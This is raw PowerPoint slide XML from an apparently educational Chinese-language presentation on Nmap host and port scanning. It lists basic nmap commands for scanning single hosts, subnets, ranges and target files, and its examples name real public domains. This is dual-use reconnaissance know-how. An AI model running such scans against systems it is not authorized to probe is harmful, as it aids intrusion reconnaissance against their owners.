          <a:srcRect t="10657" b="14272"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="38534" y="188806"/>
            <a:ext cx="1076622" cy="638175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="995796" y="260243"/>
            <a:ext cx="7967610" cy="61912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NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>掃描技術</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132984" y="1805762"/>
            <a:ext cx="2755050" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>https://nmap.org/book/toc.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="圖片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3756419" y="1451751"/>
            <a:ext cx="5039141" cy="3860081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132984" y="924300"/>
            <a:ext cx="6205874" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>参考指南</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>(Man Page) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>https://nmap.org/man/zh/index.html </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="投影片編號版面配置區 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90289" y="5490951"/>
            <a:ext cx="9120213" cy="61912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NMAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>掃描技術</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="橢圓 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4422371" y="1479665"/>
            <a:ext cx="257694" cy="27251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01476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863556103"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="271463" y="1769992"/>
          <a:ext cx="8181975" cy="3793301"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4774362">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2160549935"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3407613">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3198533954"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="160020">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2057767107"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="342900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
                        <a:t>nmap </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0"/>
                        <a:t>www.hinet.net</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>掃描主機是否有開機，並且開啟哪些連接埠</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2461284794"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="342900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
                        <a:t>nmap </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0"/>
                        <a:t>202.39.253.11</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>直接使用 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>位址來指定掃描的主機</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3890937157"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="342900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
                        <a:t>nmap -v </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0"/>
                        <a:t>www.hinet.net</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0"/>
                        <a:t>-v</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 參數，會有更詳細的輸出</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1902494562"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="548640">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
                        <a:t>nmap </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
                        <a:t>www.hinet.net </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
                        <a:t>tw.yahoo.com</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
                        <a:t> www.google.com.tw</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1"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b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>掃描多台主機 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Scan Multiple Hosts</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1027532989"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="617220">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
                        <a:t>nmap </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0"/>
                        <a:t>192.168.0.*</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1"/>
                        <a:t>nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0"/>
                        <a:t>192.168.0.0/24</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0"/>
                        <a:t>使用萬用字元，一次掃描整個子網域</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2455304165"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="342900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
                        <a:t>nmap </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0"/>
                        <a:t>192.168.0.123,124,125</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3355997195"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="342900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
                        <a:t>nmap </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0"/>
                        <a:t>192.168.0.123-140</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>掃描子網域中連續的某一段</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="545857159"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="402401">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
                        <a:t>nmap </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0"/>
                        <a:t>192.168.0.* </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>--exclude </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0"/>
                        <a:t>192.168.0.100</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3401645447"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="342900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
                        <a:t>nmap -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1"/>
                        <a:t>iL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" smtClean="0"/>
                        <a:t>hostlist.txt</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0"/>
                        <a:t>以檔案列表指定掃描那些主機</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1167915770"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="10657" b="14272"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="83344" y="139153"/>
            <a:ext cx="850106" cy="638175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933450" y="158203"/>
            <a:ext cx="8210550" cy="61912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NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>掃描技術</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="705110" y="6337828"/>
            <a:ext cx="6789231" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>參考資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>:</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https://blog.gtwang.org/linux/nmap-command-examples-tutorials/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2945130" y="5208501"/>
            <a:ext cx="1917815" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>www.hinet.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>192.168.0.123</a:t>
            </a:r>
          </a:p>
